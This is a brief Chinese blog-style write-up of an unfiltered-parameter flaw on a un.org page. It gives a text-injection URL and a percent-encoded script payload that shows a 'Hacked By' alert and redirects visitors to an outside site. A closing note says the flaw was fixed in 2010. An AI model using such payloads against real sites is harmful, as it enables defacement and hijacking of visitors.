蛋疼的“伟大娃娃”发现的。

    实际上原理非常简单,应该是自定义返回信息没有做任何过滤这类的,根本不存在任何漏洞不漏洞的问题。这种事经常有,百度也有的,百度好几个站都有~~~

    例如编写一个404页面专门处理返回错误信息,其他页面若是执行出错后,会调用这个页面。调用的过程会提交一些具体的错误信息参数,例如:404.ASP?coke=我出错啦!。若是这个:“我出错啦!”没过滤的话,就可以被利用了,例如:404.ASP?coke=hacker by hack!。运气好的话,可以直接提交html代码返回执行,直接挂黑页。

文字式:

    http://www.un.org/docs/journal/asp/ws.asp?m=Hacked%20By%20Nuclear'Atk

执行java代码,弹窗+跳转:

    http://www.un.org/docs/journal/asp/ws.asp?m=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%48%61%63%6B%65%64%20%42%79%20%4E%75%63%6C%65%61%72%27%41%74%6B%22%29%3B%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%27%68%74%74%70%3A%2F%2F%6C%63%78%2E%63%63%2F%27%3C%2F%73%63%72%69%70%74%3E

    后记:2010-8-31 0:28:04 经测试,已修复执行html代码bug,提交代码被Html编码后输出。